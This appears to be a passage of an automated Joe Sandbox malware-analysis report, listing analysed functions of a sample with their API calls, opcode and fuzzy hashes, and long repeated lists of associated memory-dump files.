                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                              • String ID: =<32
                                                                                                                                                                                                                              • API String ID: 2994545307-852023076
                                                                                                                                                                                                                              • Opcode ID: 6c533406d155eacb6f8a140ec14f8df5a989342c10858b1b2a5231aa34239d03
                                                                                                                                                                                                                              • Instruction ID: dc45c7d77f3a86dfb870d7f92c059149c9106f6ffd596d97ee72afaefa0b5c4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c533406d155eacb6f8a140ec14f8df5a989342c10858b1b2a5231aa34239d03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F83125347053049BE7699A289C90B7EB7E6EB88750F14896CEBC4572D9D739D8408781
                                                                                                                                                                                                                              Function 00FF1A10 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ,-
                                                                                                                                                                                                                              • API String ID: 0-1027024164
                                                                                                                                                                                                                              • Opcode ID: d58eab3562e55c10de1b6b0d39093d43f9583c008d9375131129b0d4a0e637fe
                                                                                                                                                                                                                              • Instruction ID: 261052520fb4b06a0e209fb5ac54c1c1563137625079a5e46c07ecd9e2d4d686
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d58eab3562e55c10de1b6b0d39093d43f9583c008d9375131129b0d4a0e637fe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 032103A1916308CBC7249F29CC52537B7B1FF82371F498618E5868B3A5F778C905D7A2
                                                                                                                                                                                                                              Function 01010340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                              • Opcode ID: ee86712f84293ad8a7d81b910fa1ebc280b021fdcbb8950368e11988a1a49e21
                                                                                                                                                                                                                              • Instruction ID: 0fb87d48bbd03da8f3329a296eea1ccccbd8ba4f37a94aa244ddd3238ee4ed58
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee86712f84293ad8a7d81b910fa1ebc280b021fdcbb8950368e11988a1a49e21
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 493101B16083048BD314DE58D8C167FBBF4EBC9324F04892CF6D887294D7399888CB92
                                                                                                                                                                                                                              Function 00FDCC7A Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470830453.0000000001236000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470883637.0000000001238000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470920275.0000000001239000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471024688.000000000123E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471091413.000000000123F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471141430.0000000001244000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471232673.000000000124C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471273399.000000000124D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471377126.0000000001269000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471454866.000000000126C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471510195.000000000127C000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000127E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471589451.000000000128A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471705587.00000000012B1000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471742405.00000000012B2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B3000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471824304.00000000012B8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2471944426.00000000012C7000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_fd0000_7620ab885d.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 237503144-0
                                                                                                                                                                                                                              • Opcode ID: 8502f24733dd7d5c90b7bd8d1771024f4bf6863051e269309d793d435f260aa9
                                                                                                                                                                                                                              • Instruction ID: 0dc945ae9417c82888a42e6b71c1bed9ec98c8096b648b32b5e8059ab72626b7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8502f24733dd7d5c90b7bd8d1771024f4bf6863051e269309d793d435f260aa9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D316CE9B002441BE61577612C63A7F34674FD1718F0C102AF5472B393EDADF906A597
                                                                                                                                                                                                                              Function 00FFD7EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1593 ffd7ee-ffd7f3 1594 ffd7f5-ffd7f9 1593->1594 1595 ffd813-ffd819 1593->1595 1596 ffd800-ffd809 1594->1596 1597 ffd896-ffdbfb FreeLibrary call 100fe00 1595->1597 1596->1596 1598 ffd80b-ffd80e 1596->1598 1602 ffdc00-ffdc12 1597->1602 1598->1597 1602->1602 1603 ffdc14-ffdc19 1602->1603 1604 ffdc2d 1603->1604 1605 ffdc1b-ffdc1f 1603->1605 1607 ffdc30-ffdc72 GetComputerNameExA 1604->1607 1606 ffdc20-ffdc29 1605->1606 1606->1606 1608 ffdc2b 1606->1608 1608->1607
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00FFD898
                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 00FFDC43
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2468779789.0000000000FD1000.00000040.00000001.01000000.00000009.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468726882.0000000000FD0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468779789.0000000001015000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468921125.0000000001025000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2468955080.0000000001031000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469124683.0000000001187000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469173851.0000000001189000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.000000000119F000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469210213.00000000011AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469303471.00000000011B0000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469354998.00000000011B4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469390031.00000000011BF000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469439536.00000000011C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469497351.00000000011D8000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469541734.00000000011D9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469578081.00000000011DC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469626117.00000000011DD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469674067.00000000011DE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469706807.00000000011E3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469758740.00000000011E5000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469822175.00000000011F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469862708.0000000001206000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469894994.0000000001207000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469947635.0000000001208000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2469980819.000000000120D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470030286.000000000120E000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470079606.0000000001212000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470191722.0000000001219000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470228437.000000000121B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470334932.0000000001229000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470389520.000000000122C000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470701406.000000000122D000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000009.00000002.2470752592.000000000122F000.00000040.00000001.01000000.00000009.sdmpDownload File
